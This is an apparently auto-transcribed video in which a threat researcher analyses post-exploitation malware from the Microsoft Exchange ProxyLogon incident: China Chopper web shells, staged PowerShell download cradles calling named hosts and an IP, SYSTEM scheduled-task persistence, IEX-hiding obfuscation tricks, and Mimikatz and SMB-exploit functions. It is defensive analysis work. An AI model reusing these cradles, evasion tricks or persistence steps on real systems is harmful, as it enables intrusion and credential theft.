 So I think there is a certain amount of or an element of risk and putting out kind of a video like this that is so Timely and current and obviously this is still kind of a breaking and emerging thing I Don't want this to be Something that kind of gets other threat researchers or other analysts kind of like in a tizzy I don't want anyone to be upset or going crazy like all of the stuff that I'm going to end up sharing in this video is public right and I care specifically much more about the tech Technology the tradecraft the technical analysis That the techniques that they're using kind of on the keyboard and stuff like that when we're looking at bad guys You're looking at hackers and threat actors What I do want is for this video to be all about education and bringing this into the spotlight and showcasing it and Raising awareness because I think that we're doing this sort of stuff threat research analysis threat Intel It's so that we can better the community right so that everyone else is kind of in the know and aware of this stuff so Again, this will be kind of just showcasing technology and what we're seeing I will Note of course that look Disclaimer, I don't know all the things and if I misspeak or if I'm wrong, that's totally cool I hope fingers crossed. Please be cool with that Let me know in the comments share and obviously as I said This is sort of an ongoing thing and that it's still kind of developing so Maybe the stuff that I end up showcasing it will be out of date and not applicable in the next day or whenever you happen to watch This video or as new things develop and obviously if you see anything new or interesting or peculiar Please do share. There's an email in the description. You can hit me up anywhere online Discord Twitter LinkedIn blah blah blah, you know, you can find me. It's pretty easy to cyber stalk me And there's the risk again, right so Anyway enough of me blabbering that was a two-minute introduction that was not necessary, but this video I want to showcase some of the post exploitation from some of the Microsoft exchange Proxy log on hafnium incident skyfall, etc So I just want to be showcasing the technology and showcase the education piece of that and some of the post exploitation stuff That we're kind of tracking or at least what we've seen so far So I'll get to my computer screen here and we'll take gander I have my gist my github gist page open and available and I'm gonna be kind of pouring and scrolling through here So this is as I mentioned off the tails of the Microsoft exchange kind of vulnerability that came out and has been Being exploited and is still kind of actively being exploited. So recently I just updated this one here for the china chopper web shell So if you're interested in some of this other stuff or if I'm not laying out the background and the backdrop or setting the stage properly here the exploitation of these Microsoft exchange servers comes with a sort of Indicator of compromise right the IOC's and that you might find web shells or ASPX web shells in a Specific file location either through kind of the default installation of Microsoft exchange or kind of shown through in like an IAS web route here now When this broke when this went down like there were practically no Antivirus or EDR programs or solutions that would stop this because oh Web files in the web route directory that sounds totally normal no cause for concern a suspicion keep in mind It's the contents of this web files that is kind of spooky and sketchy So I will showcase this and I've done plenty of work with this kind of through my own day job So if you're interested you can certainly dig up some other stuff in case I don't explain this all that well But I just updated this with some of the other recent findings that we've seen here So tons and tons of stuff right but the ASPX shells that have that china chopper Structure and actually let me Google that China chopper To give a little bit more color behind that right This is an article that fire I put out back in 2013 so like this is a known thing and some of you that play capture the flag or some of you that are kind of into the Scene look, you know It's the equivalent of like a PHP one-liner thing where you just fire up and pass in system with an HTTP argument like a get variable or a post variable. It's literally the exact same idea and that hey you just end up passing along a Variable or kind of an HTTP get parameter argument We're calling it a key or a password because obviously you or the attacker would need to know what that the name of that key Or that variable happens to be and that can sort of allow for some Mental gap as only the people that know that password will be able to execute code there But that's it. There's it in ASPX and they have a rendition in PHP This also has a lot of other functionality and I think some like a whole front end for how you can do things with this That's what a lot of this stuff that fire I was showcasing here But it boils down to just that syntax of like yo Taking a variable from the HTTP request and execute like it's it's a command You're operating from the command line, etc. Etc. Do they have the syntax for the PHP one? Yeah Yeah, so there's ASPX which we're what we are seeing and of course PHP as you've seen it like an eval or an exact Pass through system, etc. But just an HTTP variable. That's kind of all that it boils down to Okay, that was enough of that backdrop sorry But we're seeing all of these different potential web shells and we try to create a list of them because a lot of them tend to being just random like a through z uppercase lowercase with some digits in there Or some of them and I we tend to call that like a random file name But some of them also tend to be static like a T or an error page or some is as ballsy to say shell load outlook en Etc. Etc. HTTP proxy support with the zero to be leaked and you can see the syntax here That just is doing a weird job and like not showing But of course you can see that key or what it ends up moving through Some of these I think are really interesting because there are a few cases where you'll see oh and at least an effort or attempt to Maybe do some evasion where you can catnate the strings for the word unsafe as if that's gonna get through some signature detection Maybe it does maybe it will again. Do not know Other ones are also interesting where they're like getting a whole request object out and like saving a file out of it I do see some that I think are just using like Another PowerShell request or payload. Let me pull it down. I think it's down here below, but That's kind of the normal one that and oh nine Etc. Although we've seen other variations of it and you can see some of the static ones like orange or bingo or Ananas Where is the other neat stuff there it is there it is there it is so eval system text encoding utf-8 get string from base 64 so you base 64 encode some of these and it's like a whole random hash For that variable for that HTTP request one of these. I'm not exactly positive. It's like Maybe there's just maybe they're making a mess who knows and some of them are also peculiar I think this HTTP slash F like isn't a thing Obviously checking out the etc host file for the victims for the target compromise machines There is no domain F and there isn't just one on the internet, right? I'm pretty sure it's just to Cram it into the external URL, which was that field in the OAB Directory configuration thing to look like a URL, but then because this is going to end up being rendered as ASPX Just jam in the script tag here because that's actually what's going to be in it being executed server side anyway Enough backdrop. We're like 10 minutes in the video and we haven't even gotten anything interesting so This is the web shell That means the attackers have remote code execution. They have access and availability to run commands and operate on that machine boom this thing affected like all versions of Microsoft Exchange all of those servers are typically publicly exposed the internet bad and There people just kind of spraying and praying the bad guys are just like hey, man Let's whack the whole internet with this thing. Let's see what falls out So hence the scramble hence the concern and and maybe I'm like Maybe I'm maybe I'm hyping this thing up too much, but we kind of thought it was a big deal so Now and this is breaking right so this is going on for the past week and a little bit earlier when it's all started to Kind of fall through so maybe I'm late on getting this video But now we're seeing post-exploitation now. We're seeing the techniques and tradecraft that follow this so What is going to go down? What are the hackers gonna do are they gonna drop ransomware? Are they just gonna exfiltrate data? Are they gonna like I don't steal things to sell out on the dark web spooky-wookie Are they going to use a crypto coin miner like just start harvesting bitcoins become part of a botnet I don't know. I don't know. Anyway, let's get to one of the kind of Indicators of compromise right we saw the web shell, but now what commands are the attackers going to run on that web shell? So I have this one that I want to bring us down the rabbit hole with and I call this file stage zero dot cmd So catting this out to take a look at what we got here This was just one of the logs one of the thing that we had seen that was detected I think defender actually ended up seeing this and like quarreled though. They removed it, but CMD Run of the command prompt right Slash C so we run one command in line passed in his arguments and we kickstart power shell Power shell tack EP for execution policy where we bypass the execution policy and tack E for Enc or encoded so you can pass in an encoded command and it's basic C for encoded, right? So we can see all this gobbledygook all this nonsense all this techno jargon. It's base 64 So we can pretty easily just go ahead and Decode that right? That's that's what base 64 just lets us do so I will go ahead and cat or excuse me I'll echo that out Copy and paste that and I will pipe it to a base 64 Takti or minus D so we can decode ah and This is what came out so IEX or invoke expression, right and invoke expression will execute code It's essentially an eval statement, right? The argument or the string that is passed to it will run as if it were a power shell syntax and command Now we create a new object net web client So we can access the internet and we download a string present at this location HTTP p.es 09 I'm gonna call it pest online even though obviously it's not that's not what that says But that's just kind of an easy thing to to name that with we can address that problem and it goes to P with an HTTP variable e Included as a little get variable there the question mark so What is that thing we kind of want to know? Hey, what's what is that? What is on that page? Does that page still exist? So I'm gonna go ahead and copy that syntax and I will simply Try to see if that again actually still exists No, okay, so It wasn't ending up being a thing at least not right now I'll bring this to you because I will lay the foundation and that we went ahead and contacted the Owners of that we tried to like some who is we would try some showdown to get ideas of what this thing is It was a digital ocean IP address as I'm sure you're seeing a trend in the digital ocean No cloud a provider that that this has been this hackers use They're one of choice And I think name cheap was a one that had the domain so we notified them and then they Stopped it. They pulled it down from what I can see now But I did save the original payload and the tech that came from it So I want to showcase some of that now again all of this is present here on My GitHub gist you can see you know, I made these a couple days ago when I just tried to store all this and make it visible and accessible to other people So this is the PS online or pest online, right? We'll call it and they're stage one Now if we go check this out, there's a lot here. I don't know if you can see that horizontal bar, but Boom plenty of stuff. So let me grab that syntax and I will simply Call that what do we want to call that stage one right stage one dot ps1. We'll slap it in here and Of course it starts with an invoke expression. Now. Let me cat this because it might be a little bit easier to see It's just a wall of more base 64. However It's going to end up creating this as a memory stream Taking that base 64 Decoding it and also deflating it with some compression algorithm Normally, you'll see like gzip being used to decompress some stuff deflate That's another kind of variation, right? And obviously at the very very end we'll go ahead and decompress it and read to the very very end of it And it'll execute that because of the invoke expression at the very very top. So this structure is very normal for a Another power shell stager Question is okay, what is actually in this code because we're using invoke expression We know at the very end of the day, this is going to end up translating out to power shell syntax more power shell code Well, we want to know what that is. So if we were to try and like defang this Sure, we could grab this base 64 syntax all on its own We could decode it. We could deflate it with I guess I think Zlib, right? Maybe I'm wrong in that yell at me if I'm not if I am and then we could just do it kind of ourselves or Because it's power shell syntax. We can just let Power shell decode it as long as we are certain we have removed that invoke expression So we don't actually execute this so we don't run it on our own system. So I will copy all this and I'm gonna fire it up No, I think I need a shift controls it and I think I'll throw it in power shell, right? So If I'm running this in power shell on Linux, I Don't exactly know obviously because we're just decoding this data if we were to actually end up running something then it If it uses like Windows internals or Windows stuff and it will just fail That's kind of the the gambled the dice roll that you do when you try and run some of the stuff on in power shell on Linux so also have a Windows VM kind of prepared and ready for you, but in this case it should totally be fine So let me paste all this in You can see I have removed my invoke expression. We're just starting with this object here So I just want to see what this returns. I want to see what comes out of this. I'll hit enter and There we go now We have more code and more syntax and looks like this is actually pretty telling so I will grab This oh, and I actually didn't finish. I didn't get to the very very top here. There we go. There it is copy that and Let's just get another terminal over here because we'll keep power shell open up there I don't think I have a profile set up to change that to blue But let's get what is it stage two now slap that in and now we're seeing some more new interesting things We start with some enumeration the bad guys are gonna want to know what is the computer that they landed on? They retrieve the Mac address with a get Mac. Is that something that's defined in here? No, well that looks like a CMD command Looks like an old-school command Does that actually work? Fire up my Windows VM So now I just hopped over to a Windows virtual machine, right? I have Windows terminal open, but it started me off in PowerShell. I want to get into CMD because That could end up being I don't think I have the stinking shared clipboard on in this advanced I Had to reset this VM some time ago because it uh There we go. It was just not behaving with like Windows updates or whatever Let's run this Okay, and there we get a Mac address so that can be poured in We skip the first line convert from CSV get the header Mac and Expand on that Mac. So it just grabs the Mac address. That's all that that variable is gonna end up doing then we try Sorry bumping around if global psexec Can be executed exe flag is Flice I don't even know how to pronounce that I think that's just checking if psexec is a thing I'm not a thousand percent positive. There's nothing malicious in that. So let's just kind of go do it There we go, I'll exit out of CMD and get us back into PowerShell and yeah paste it anyway, who cares I'm just kidding. You should care. Okay Looks like that's okay. It does return that object and Is exe flag set? No, it is true It is not place unless place is already defined, but I'm pretty sure it wasn't name. Of course. We'll still be a thing Okay Then we get the date we store it in DT as a variable the path is gonna end up being our environment Variable for the temporary location and it puts it in ccc.log. Okay Flag as to whether or not that exists because we're just testing the path that will go ahead and Verify. Hey, does that file exist already in determinant? Let's try to run some of those now of course DT as our current date and What else did we just choose path? Yep path should have evaluated out fully to my temporary directory Which it does and we called it like what flag and that is false because it does not yet exist Okay, so let's get back to This here permit looks like it's going to end up checking the current identity and Checking if it is an administrator, right? So if it is in an administrator role The key that builds out is going to be the MAC address which we've just determined AV which it doesn't look like I Don't think it ended up getting Version did I miss some of the code here? Get WMI objects gets the version and the architecture for the 32-bit or 64-bit Oh and the domain and user and PowerShell presence. There's a lot. Okay. Okay We can explore this in the gist again, and I have that code still publicly available. So let me just verify that get back to our Firefox here and This should be what we called stager zero two. Okay. No, and that's the exact same syntax I didn't see that AV variable be defined or used yet Huh, that's fine Okay, then if We do not have our logging set up we will create it and If we are an administrator seemingly from permit variable up here We'll go ahead and do the same PowerShell download cradle for IEX invoke expression now downloading from CDN dot chat CDN net with P high or Hig set to the date odd DT is set to date Okay And the text that returns from it it retrieves as bytes base 64 decodes it and then sets up a service Right. No, no, no a scheduled task. So SC exec is going to be argument slash create running as user system Configuration with the minute for every 45 minutes. We will run a task name win it W I N N E T slash TR And that syntax and code will be PowerShell Running the code that it had previously downloaded from CDN dot chat CDN dot com Of course bypassing it and encoding it and slash F Ah, and then go ahead and when it goes ahead and creates it so slash file path With the scheduled task creating that schedule task. Now that is Persistence right so every 45 minutes will go ahead and run something as a system user And it's going to be variable on what is returned from this domain and The Hig variable isn't actually set to anything It's just including it in the it's just including the date time like in the request, but it's not being used as a variable It's not being set equal to anything So maybe they're just using that to keep track of the timing as to when they're seeing these responses and of course every 45 minutes Well, then they don't even need to run this request every 45 minutes They've just downloaded that persistent code from that location. Ah Okay otherwise If it's not an administrator It will download Again from CDN dot chat CDN net low as the argument and DT being the date one more time But now they aren't using that slash R U or the run user as system because it's just going to end up running in the current Context of the current user so it's not an administrator and cannot use that system level There we go. We should go ahead and explore what that Location is at CDN chat CDN scheduled tasks run For win it task name win it and that's its persistence that it has kickstarted and is now in action Executing every 45 minutes. We should go find out what that is. We sleep for a random amount of time We try to get a W my object for the Processes that are running select string pattern for download string So it looks like it's trying to find its own Coding there if run dot length is less than zero So if it actually found a result and it has not been executed it creates this O nps variable which is a argument again to cmd.exe Slash the running PowerShell no profile window format is hidden Execution policy bypass and tax see for the command that we want to run and it's going to run another download cradle Downloading from that IP address With an update dot PNG and the key that it has uncovered from all of our Mac address and information everything that it already kind of extracted with its own enumeration. Ah Okay, and then it will execute that O nps and otherwise it tries to kill PID was PID ever defined Or is that just a PowerShell thing? There's no way that's just a PowerShell thing is it PID? Oh Today I learned right TIL that's why we do this ladies and gentlemen so Let's go. Let's go see if this thing exactly exists CDN That chat CDN net slash p Higg or high high and low Mmm So that one does exist When we were to supply low I Think we get are these the exact same let's try and redirect that out to Higg And let's redirect that to low and I'm not including the date in here I don't know if it will actually make any difference but Can I cat Higg? Is that now what about? Low if I diff Higg and low They're the exact same file Shoddy 56 um Higg and low. Yeah, literally the exact same so no difference Whether or not you are an administrator or not in that persistence. Now. What is that gonna end up doing right? Let's go ahead and find out We have That syntax once again using that PowerShell setup invoke expression Deflate string from base 64. Let's get everything other than that invoke expression and let's bring down our PowerShell prompt from before slap that in and Now we have this thing Okay Goodness Is this thing like fully reversed? This is disgusting Let's say that and let's call that Persistence on ps1 slap all that in mm-hmm. Mm-hmm invoke expression Joining regular expressions that match that Which is totally in reverse kill That thing this whole thing is reversed You can see like start process over and over again Does this actually ever reverse it? Yeah. Yeah. Yeah, right to left All right, so rather than running invoke expression on this one more time Let's be dangerous Nerf that I'm removing the I'm removing the parentheses that was following it So now I can try to just slap this into PowerShell one more time Here we go There we go And this is still kind of really messy to read Is this the exact same code? I see that get mac flag in there um Subtle Decoded persistence stop ps1 Oh gosh, this is gross They're gonna end up using semicolons though because it's all in line. So what we can do Are they gonna end up using semicolons? What the f? You know what let's split on the plus sign and then make it a new line plus sign So it's a little bit more readable Not that that's really readable whatsoever, but This is the exact same setup They're getting the mac address again They're setting the ex a exe flag. What is this? What is this xw h though that I'm sure is being replaced Yeah, it totally is Because that's going to end up being the prefix for a variable. You can see that b code that we saw earlier There's that chat one more time exactly That chat cdn domain and All this replacing is going to end up actually happening. So you know what let's this needs to be ran again This isn't actually going to be executed actually actually Be super duper careful with this one. I see it right here. I see to the very very end It's piped into an ampersand with ps home index 4 And ps home index 30 and an x that should be iex Let me let me let me check this out. Let's grab the syntax Let's get over to our windows virtual machine and I'll slap this in Thanks windows I really appreciate that. So ps home. This is a this is a well-known trick. Um ps home. Let's get this variable you can see here ps home index 4 Like there's the original string that looks pretty benign It's just where your your power shell home is going to end up living and existing But ps home index 4 is an i And check it out ps home index 30 Is an e so when you can catenate that all together you get the value iex And I love that windows actually knew that like amsi probably was like na na na So don't let that execute Because that's going to actually Run it, uh, that is a known trick at the very very end They'll try and hide the iex by wrapping it in other variables and extracting an individual index out of that So if we were to go ahead and get Replacing this xwh right You know what I'm pretty sure it'll end up Just speeding it all out as it with a dollar sign xwh is going to end up being a dollar sign So let's remove that iex and of course trust in ourselves Slap into power shell Run that code and look this is literally the exact same syntax Let's set that to power shell. It's doing the exact same thing grabbing the mac address Expand try except it doesn't have new lines, which is horrific and hard to read. It doesn't even have It doesn't even have semi code. So what's going on? But there's that again same ip address update dot png Yep. Yep. Yep setting persistence with winnet Like forcing that persistence over and over and over again dirty Okay, okay. I think that's I think that's all that we're gonna end up getting out of that We we still have more that we should kind of review and look at but before I drive onward I do want to note that if we were to google around and try and research some of this structure like if I would I don't know if I'll actually get the hit Doing it. I'll go to google Just to go here See if it's around No That might be too obscure ccc.log I'm going to I'm going to weird places on the internet right now. I will I will okay. Let's cut to the chase This is a known thing like this syntax has actually been seen around I guess 2019 carbon black put this out um Thanks ryan murphy kudos to you This dives into a little bit more like malware analysis and like actually showcasing the whole storyline So kudos to you much better than me, but take a look They do this exact same setup or it's obviously going to end up being another power shell download cradle But once it pulls itself down once this power shell payload and that download creator runs You end up getting Some other obfuscated stuff That eventually turns into The exact same syntax that we've seen thus far i ex for string mac Getting the mac address doing this Literally using ccc.log Using the exact same log file the exact same code and techniques creating where is it win it? Yep, it's win it once again that persistence Downloading from chat.cdn.net Downloading from a different ip address here, but slash update so This is only one route Obviously like this is only one of the command and control post exploitation techniques that we've seen thus far coming out of the microsoft exchange incident but This apparently is already a known thing um There is research on that from from two years ago So i can uh link this in the description if you have any interest in reading along on that But we thought that was um, um, what is this? We we have apparently already known about this in in our world. So all right Wanted to showcase that and i'll share that with you all as well You might remember Ladies and gentlemen that we are not yet finished in what we could do with this stage two file because We checked out cdn Dot chat cdn.net But there was one more ip address There was one more location that we could end up going right down here when it tried to execute code Coming from this ip address 188 166 162 201 update dot png it'll include a key And i don't know if i need to supply that right now Let's see if we actually get a response without it and of course like Classic right we've seen it before Trying to smuggle power shell code inside of a png file. Look, it's not a png file. Let's curl this down Let's see if it still exists and it does so More dirty work in here. Um, let me actually save this copy of what is that stage three dot ps1 Now i have this still stored and saved in a github gist Strolling back This was the update dot png dot ps1 and this is a large file So if we were to view the full file, um, i'm just going to copy in and save this as well Oh We'll save that as other stage three Dot ps1 that it did include a key when we passed it along Uh, so if i actually check out stage three What the heck Did curl not like actually output that for me? I curl's output is tack. Oh, isn't it? Yeah, because wget does the tack capital o attack lowercase o for curl Stage three dot ps1 What's going on we just saw that output It's right here The file is huge granted. There's a lot of base 64 Sorry, sorry. I know this is really painful on human being eyeballs Look at this Look at how far my scroll bar is right now I mean it got it. No, no, no. That's that's actually from hig Shoot You can see the previous commands. That was that was from an earlier one Maybe for the sake of our own sanity, we should yeah, let's stop Let's stop. Let's just get the one from the gist, uh, and we'll use that other stage three dot ps1 good enough So what do we got here ladies and gentlemen? Same exact setup ginormous line. Let me actually check that out lsql a Other stage three. This is two and a half megs Mm-hmm Two and a half megabytes of base 64 compressed data. So if we were to See all of this there's a deflate stream All of the noise the nonsense going the very very and there's nothing else in this So as usual, let's nerf that invoke expression Copy that syntax and let power shell do the magic for us. Um, I'm gonna end up slapping this all in And it might take a long time. You know what that was a horrendous idea At least we look like a real hacker now. Where's my mask? Where's my where's my guy fox mask? We try to have fun here on this channel So if any of you guys they're like real professionals are watching this video and we got to this point. Look, I'm sorry I started off the video all like cool and somber and now I'm just goofing off All right, I'll pause the video recording and we'll we'll we'll get back to when this is done I should have just ran this as a script. I'm sorry Okay, hi, uh, I tried to kill power shell To stop that from happening. Uh, it didn't work Apparently so I just uh ran it and redirected out to a stage four and I opened that up So before I dive in though, let me take a look at this. This stage four is now uncompressed, right decompressed and we got three max So let's take a look at that guy a sublime text is like, I'm trying to trying to catch up with you here, john but this this one I think is neat and I do want to showcase this to you so Take a look at that first line first of all Really wonky really messy and this is ginormous. I don't know if you can see my horizontal scroll bar down to the very very bottom of the screen But there's a lot going on and it takes a long long time to get to the very end of that line Uh, let me table that for the moment But scrolling down we can see other power shell syntax that might be continuing on from the very end of that line. Um But following that We create this function. Oh, sorry. I'll scroll down here dhwe kid um It creates some bytes and variables and all these things here Uh That some of this is obfuscated right and some of it is not which was weird to me like you can see these functions here new New packet smb2 session setup request and it's like creating smb packets um Make smb1 trans 2 exploit packet I think some of this actually comes from empire and I might be wrong in that but I'm we were we were kind of hunting around Googling as to wtf is this thing we I thought we saw some uh semblances there But uh and some of them have like different completely random Uh conventions for how they're naming their functions Some of them are like a more power shell like verb noun set up with capitalization Although some of them have like the all lowercase snake case. Um, we just saw earlier And it's just kind of weird So as I was scrolling through here and there's a lot right there's about three megabytes of all this information a lot of it is um Those function names that we saw for smb. You can see invoke smb c maybe that's channel And I won't end up going through a huge analysis on this the way that it stands right now But I'm going to keep cruising through because maybe You might have noticed the same thing that I noticed that I thought was Incredibly weird and incredibly strange. So first of all, uh Just to make our analysis somewhat easier and sane And this is what I ended up doing while I was going through it in real time Is that I would try to look for all these function names um So I'd look for function dot whatever and I would just hit find all So I'd have them all selected and I'd copy them out and bring them into a new file So that way I could look for all the function names I guess I'll uh make some of these Capital function. Oh, so it's not going to give me that syntax. Whatever. Oh, it's because of these curly braces Um, but this at least gave us a a decent idea as to what all this code was doing Now as I scroll down here Some of these are very very strange. I don't know if you see this k d h s d hyphen There's a string in a comma and then random base 64 all the way at the end And then it just adds an if statement way off to the side That didn't make any sense to me and it wasn't just that one There were multiple were make smb 2 etc etc etc Function main that would be worthwhile to take a look at another new tack p random base 64 So looking through that that kind of tipped me off initially But as I was continuing to scroll through here and look for interesting things Like I think we saw like a what a dumb patches. Yeah, there's a function called dumb patches, which is sus um I think there were some other odd ones but Keep an eye out for this weird Setup where you have these single quotes and commas And then other random base 64 data that makes no sense. That's not normal power shell syntax. So Eventually we were like I was staring at this whole big long line at the top here Because it makes no sense as to why that's all there. So I turn off word wrap And now we have this humongous chunk of all of these numbers But I was like that's not hex That's not decimal ascii values. That's not octal. There's no representation of that that makes sense When you're looking at that many digits And eventually I got down to the very very bottom of those numbers in their pattern there And I saw this tack f and I thought like, huh, what does that do? Is that a thing in power shell? Following that is a lot of base 64 etc etc etc And scrolling down more and more and more I I thought like, okay, let me take all of the base 64 that I see But even some of that base 64 has these commas and Ending strings here. We're like one of these is just a the letter b Great. That's helpful So I took all this and I uh ended up taking all of those commas And replacing them with a new line Uh, did that actually work? Maybe not a bad example Yeah, whatever Forgive me praying to the demo gods always fails. Um Anyway, the point that I came to when I was looking at just that base 64 as if that was being used I thought it was really really weird. I thought is that actual syntax in power shell where you just randomly use tack f So I thought let's take this string Including the base 64 and let's see if we could actually get anything out of it um So I I brought it over to windows 10 power shell and tried to paste it in. Yep do it. Oh god. Why did I why did I stinking? Eventually I realized I hit this error It says error formatting a string index zero based must be greater than or equal to zero and less than the size of the Argument list and I thought like wait a second error formatting a string Is that tack f literally doing it like an f string like in python equivalent a format string? and then I realized like oh This must be doing some f string Because looking at all these that makes sense and tactically with the numbers and the curly braces and I was trying to find like Oh, is there a uh curly brace zero? Which looks like there is right. I don't know if you could see that down there Just buy my face Is there a curly brace one? Yep, two Yep three Yep Okay, so it was piecing it all together, but what was the largest number in here? Is there Like between all the base 64 string that we saw just underneath it. How much is that? Is that there's no way? There's 3 000 commas separated there as arguments to a format string Like I see numbers up to two six seven nine I think I saw some three thousand somewhere. Yeah, three thousand four But then I had this epiphany and I realized The entire power shelf script itself is being used as a format string All of the different chunks and all the different portions that we are randomly seeing Where you're starting to add in parameters and create variables But then suddenly have a random string with a comma and then base 64 in the middle That's impossible in power shell syntax. That's literally not how it will tokenize and run Then I realized This is a giant puzzle where they're reorganizing reordering and rearranging all the pieces of the script and then Using that as their final payload. So that kind of blew my mind and I thought it was really kind of neat So at the very very top, here's a crap ton of numbers It's all passed with tack f to create a format string and the entire power shelf script is a format string Isn't that so cool Obviously horrific and malicious and nefarious and bad, but so cool Now here's the kicker, right? Of course, this is all going to end up being a string Does it get executed where in this giant glob of three megabytes of power shell Creating over what is that? What is that? How many lines is that 10,269 lines of code? Where is the iex? Where is the invoke expression? Is it going to very dangerously throw it in there somewhere and I have to hunt it down? We'll know Because all this string is going to be joined together in place rearranged and reordered like those puzzle pieces And then the very very bottom Check this out the exact same kind of tradecraft and style that you just saw previously where it's piped Into an ampersand to run it with env comm spec Indexing that out joining it all together. I'll show you this. Let me take this real quick. Take that syntax Hop on over to my windows power show here paste that in iex Again, just another technique to index out individual letters from a known variable that will be constant and static on every single target Every single victim comm spec should typically always be cmd.dexc Take index 4 take index 15 take index 25 Slap that all together as one string now you have crafted the alias to run invoke expression and your spooky scary evading antivirus and detection So now so far in this video We've seen two ways to do that and obviously there are many many more Just grab any kind of static known environment variable on the target, which should be the same across all targets and then cram it together Smart smarticle So with that said Now we know what to nerf now. We know what to defang and remove from this So if I take this stage 4 and just kill that iex at the very very end now I could safely run that stage 4 and Rearrange it reorganize it re-orchestrate what this script would originally look like and it will have the original string the original script So let me smartly do that with power shell this time. I'll run power shell stage 4 And we'll redirect that out to stage five jeez um Let it go Cool. All right. So now let's see if that exists and is relatively sane And it is This is much more readable and makes much more sense than the previous one and you can see Some kind of well-known other other tricks where you just throw back ticks in for the power shell syntax because The back tick is the escape character in power shell So normally we use a backslash n to create a new line another programming languages or scripting language or backslash t to create a tab So rather than the backslash power shell uses a back tick But not only is power shell case insensitive or it doesn't care about the Capitalization or lowercase and uppercase letters. So you can make your messages look like straight up memes into the spongebob meme And You can just arbitrarily throw in back ticks wherever you want because if it's not a valid escape character power shells be like Oh, sure. I I know what you mean. Yeah, you just want a regular a character but now you're again Evading antivirus or classic formulaic stupid signature detection just tricks just just stuff that bad guys are using And we do too right as red teamers pen testers threat emulation Anyway, you can see all of these functions now as they originally were some other techniques to replace information to get looks like shares Getting smb packets like carving them out by hand or crafting them all which is kind of neat But again, I'm thinking these are part of other c2 frameworks that have all been crammed in together Again, now if we were to try and look for all the functions here And we can do that I won't actually pour through all of this because I think you get the gist and that those techniques they're using Replacing the back ticks Etc etc But a lot of this is actually kind of like decently readable, you know If we wanted to we could remove all those back ticks But some of them might actually be in different places But the the wodge wodge the replacements those techniques are are present How far are we going how many how many lines do we need to go in here? Oh, here's a good one though Before I go too far. I did see this Us getting versions right checking for the operating system etc etc And as you scroll down you do see this giant chunk in yellow here and now We have inline c sharp code because power shell can do that right So power shell can create this a multi line string with that at symbol And it will have a ping castle scanner's namespace Create a specific class where we have a scan function or functionality here Where it'll do some tcp client And it'll try and connect to the argument that's passed in on port 445 Good old smb, right network stream, etc Reading out responses trying to determine how it responds with potential name pipes Etc and I'm just going through this as a 10,000 foot view Kind of scrolling by but you can see the functionality there I'm more impressed and I think it's more cool that you are seeing that inline c sharp Be able to be brought in and compiled on the fly They're doing that with ad type and now ad type does boil down to using the cfc.exe or the command line c sharp compiler Same thing with ms build I believe so they all end up writing to disk Momentarily and I think I've either either I've showcased that in a previous video Or I have footage that I still need to upload for for showcasing that anyway That gives us the functionality and I do see some shell code also being included in here This is all from base 64 So we could go ahead and like try and spit that out But it is non printable characters So I'm assuming it's shell code and we might need to do some like scd bug or something. Oh, actually, there's some stuff in here Let's run strings on that Uh scrolling back scrolling back Hmm cmd slash e netsh.exe to take the firewall add some opening ports A Their own dns that they might end up using port proxy. Isn't that port? Is that port bending? Yeah If you haven't uh I think that's a that's a neat technique where you can like redirect one port to another one even locally So there's a port proxy syntax Uh scheduled tasks, of course, what do we have do we have win it in there? No, no, no, it's called sync uh And every 40 minutes We'll have a scheduled tasks run that will sync And what is that power shell syntax? I I don't think I've actually gone down this road yet. Is that different from that one down there? I don't think it is Let's try and echo that out Pipe it to base 64 Nope It's our good friend uh passed online With 32. Oh, oh, oh, oh, wait a second 32 What is this other one the one of the very very bottom is that going to be like 64? Is it checking the architecture? Oh, it might be Let's try and get That in there. Oh, sorry echo And I did just grab the bottom one right base 64 tech d 64 All about that architecture All about that architecture. Cool. Cool. Cool. Okay I If actually let's take the original one And redirect that out to like, um Shell code. How about that? What is that? It's just data We already ran strings on it. So I think that genuinely is shell code. It's not going to be like its own binary or anything Let's um, let's get back to stage five Now we have a local scan function where it looks like it'll take in IP addresses and I genuinely scan them Avoiding or is it including local IP addresses? API IP if I I'm assuming that's going to get it's yep their their public IP address begin connect Etc etc power dump. Is that a thing? What is that? Um Load api this looks like the classic syntax to dynamically load in an assembly Power dump. Is that a thing? Power dump empire Imagine that Just as we said Okay Pulling in other win32 apis to get more power more functionality Pulling ntlm passwords SID to key String to key I don't want to scroll through this forever because obviously this is a very very long file and we've already like I think an hour into the video recording. So We'll get registry keys though I'm sure I'm sure you might already like look if we are seeing just the functionality of empire all smashed into one power shell script then That makes sense dump hashes. Here's the original source code for that Plenty of stuff here samsam domains Invoke my pass for dumb bread going bots and custom commands parameters We could drill into that a little bit see if that's known more syntax for Itanium I don't know what oh those look like Just internal stuff for dlls. Maybe we're loading in other functions Mmm. There's a lot There's a lot right there Let's cruise through that Because I want to get to the the finale or the good stuff here I'm gonna page down through a lot of these because this is getting to be kind of huge Cannot subtract subarray add integers. Is it just data conversion stuff? Yeah convert convert Test memory range. See if it's valid memory write bytes to memory get delegate type. Aha The classic enable se debug privilege A lot of good spooky functionality here windows vista or seven detected using a different API call Here they're keeping track of what target the victim is What operating system that is We're getting to the good stuff I'm getting slowly slowly slowly To something more interesting. I know there's one last layer of the onion that I want to get us to And then we can call at the end of the video, but I hope you had fun Hope you had fun cruising through all this with me Get command line functionality. No virtual protect invoke Is it rewriting? Is it? Changing some stuff in memory Random function names. So if you if you're curious, of course, I know I'm breezing through this This is all on my github gist. So you can take a look at that one if you'd like There's obviously a lot to unravel here But this is kind of where we get the good stuff in function main here You'll end up checking the 64 bit potentially. I know I didn't bother to de obfuscate some of the stuff But there's others in here And Here we go. I think No Where are these bytes coming from? Are these defined these base 64 ones? I do want to showcase But I don't know if I already scrolled through them If anything, I can uh turn off word wrap and they will return On word wrap and then they will be extremely visible. But oh look at this. Look at this These are these are uh Mimi cats commands Is that corralsa crypto? Yeah, yeah, yeah Oh, here they are here are these bytes So Checking out these bytes here This is all base 64, of course, right? So we can echo and decode all that. So let me echo this one Oh, how's my how's my terminal doing? Okay, he figured it out base 64 attack d and where did that one? What was that one called bytes 32? or ds bytes um Des bytes we'll call it And let's check out what that is That is an executable 64 bit Okay, let's get this 32 one bytes 32 Let's echo all of that out to a base 64 minus d my face is in the way Just trust that I am redirecting that out to um What was that called just 32 or Uh, we'll call it 32 Fair enough. Let's cat that 32 or no no let's run file on r32 And that is 32 bit, right? So our des bytes Is 64 bit and that 32 is 32 bit Make sense now running strings on let's go for the 64 bit one you can take a gander because Unfortunately, right? Unfortunately, these are not Dot net compiled once so I wouldn't be able to crack this open in dn spy or il spy and kind of get an understanding for it We can 